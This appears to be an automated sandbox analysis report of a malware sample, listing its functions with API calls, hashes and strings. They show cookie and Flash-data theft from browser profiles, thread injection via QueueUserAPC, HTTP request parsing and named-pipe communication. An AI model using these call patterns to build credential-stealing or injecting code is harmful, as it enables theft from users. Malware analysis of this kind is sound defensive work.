    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
